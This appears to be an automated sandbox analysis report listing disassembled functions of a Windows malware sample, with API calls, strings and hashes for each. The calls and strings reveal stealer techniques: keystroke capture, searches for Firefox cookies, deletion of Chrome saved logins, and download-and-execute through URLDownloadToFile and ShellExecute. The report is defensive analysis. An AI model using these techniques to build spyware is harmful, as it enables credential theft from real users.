                                              Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                              • GetLastError.KERNEL32 ref: 0041A84C
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                              • String ID:
                                              • API String ID: 3587775597-0
                                              • Opcode ID: 19440a543c0d22c155e1aa9136b71f950e5576c6fd55d2569da49b982f6bb763
                                              • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                              • Opcode Fuzzy Hash: 19440a543c0d22c155e1aa9136b71f950e5576c6fd55d2569da49b982f6bb763
                                              • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                              Function 00449210 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370timeCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00449292
                                              • _free.LIBCMT ref: 004492B6
                                              • _free.LIBCMT ref: 0044943D
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                              • _free.LIBCMT ref: 00449609
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                              • String ID: v%(/
                                              • API String ID: 314583886-2435473048
                                              • Opcode ID: 8093d2f3b8c045a868d7bcc6f26560e4bd8a72bf10d174932f02c5f03ba06de8
                                              • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                              • Opcode Fuzzy Hash: 8093d2f3b8c045a868d7bcc6f26560e4bd8a72bf10d174932f02c5f03ba06de8
                                              • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                              Function 00419B86 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 245fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Find$CreateFirstNext
                                              • String ID: 0C[$8eF$PXG$PXG$NG$PG
                                              • API String ID: 341183262-4273802141
                                              • Opcode ID: 8c3aed3000d7320fdc4dd7ad3aab95109fbf953b62b004a5a2cf60f030c844a3
                                              • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                              • Opcode Fuzzy Hash: 8c3aed3000d7320fdc4dd7ad3aab95109fbf953b62b004a5a2cf60f030c844a3
                                              • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                              Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                              • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                              • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                              • API String ID: 1164774033-405221262
                                              • Opcode ID: 07425786a733f007aeb9a950477bd56cbd674cdc9204bf77bad9fc47ca870fce
                                              • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                              • Opcode Fuzzy Hash: 07425786a733f007aeb9a950477bd56cbd674cdc9204bf77bad9fc47ca870fce
                                              • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                              Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                              • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                              • GetKeyState.USER32(00000010), ref: 0040A46E
                                              • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                              • ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                              • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                              • String ID:
                                              • API String ID: 1888522110-0
                                              • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                              • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                              • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                              • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                              Function 004541D9 Relevance: 11.9, APIs: 1, Strings: 5, Instructions: 1381COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __floor_pentium4
                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$v%(/
                                              • API String ID: 4168288129-2425067422
                                              • Opcode ID: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                              • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                              • Opcode Fuzzy Hash: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                              • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                              Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                              • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                              • API String ID: 2127411465-314212984
                                              • Opcode ID: 906faeb5203d37c74ddcedaba27fd20c986479be3f450a41c0319093749beec0
                                              • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                              • Opcode Fuzzy Hash: 906faeb5203d37c74ddcedaba27fd20c986479be3f450a41c0319093749beec0
                                              • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                              Function 00406EEB Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 222filenetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                              Strings
                                              • open, xrefs: 00406FF1
                                              • C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, xrefs: 00407042, 0040716A
                                              • 0aF, xrefs: 0040712C
                                              • 0aF, xrefs: 0040701B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DownloadExecuteFileShell
                                              • String ID: 0aF$0aF$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$open
                                              • API String ID: 2825088817-1546693839
                                              • Opcode ID: e2ffd63addb94ba147d74eaf4cb76dc7edd8d28aacd664d9fcd8ebc301bfbf31
                                              • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                              • Opcode Fuzzy Hash: e2ffd63addb94ba147d74eaf4cb76dc7edd8d28aacd664d9fcd8ebc301bfbf31
                                              • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                              Function 00408847 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040884C
                                              • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                              • String ID: xdF
                                              • API String ID: 1771804793-999140092
                                              • Opcode ID: f4b51b2c778cc903a76b83995408fe472956efc0dc2707ff349452219b6188ab
                                              • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                              • Opcode Fuzzy Hash: f4b51b2c778cc903a76b83995408fe472956efc0dc2707ff349452219b6188ab
                                              • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                              Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                              • GetLastError.KERNEL32 ref: 0040BA93
                                              Strings
                                              • UserProfile, xrefs: 0040BA59
                                              • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                              • API String ID: 2018770650-1062637481
                                              • Opcode ID: 8d1b9c386d9f6ca777f4705084fddfe26be0f649cbc95c9792bf321ed182c299
                                              • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                              • Opcode Fuzzy Hash: 8d1b9c386d9f6ca777f4705084fddfe26be0f649cbc95c9792bf321ed182c299
                                              • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                              Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                              • GetLastError.KERNEL32 ref: 004179D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                              • String ID: SeShutdownPrivilege
                                              • API String ID: 3534403312-3733053543
                                              • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                              • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                              • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                              • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                              Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00409293
                                                • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                              • FindClose.KERNEL32(00000000), ref: 004093FC
                                                • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                              • FindClose.KERNEL32(00000000), ref: 004095F4
                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                              • String ID:
                                              • API String ID: 1824512719-0
                                              • Opcode ID: 59e39cceb89accd49a364b67fce820dfbb3b5ce655084222bcfd4fd7aa577296
                                              • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                              • Opcode Fuzzy Hash: 59e39cceb89accd49a364b67fce820dfbb3b5ce655084222bcfd4fd7aa577296
                                              • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                              Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                              • String ID:
                                              • API String ID: 276877138-0
                                              • Opcode ID: d2aae47141dcf0d9b89d10f0773cee60e0a3b0657566105474702d9dbd979937
                                              • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                              • Opcode Fuzzy Hash: d2aae47141dcf0d9b89d10f0773cee60e0a3b0657566105474702d9dbd979937
                                              • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                              Function 00451D58 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                              • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                              • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
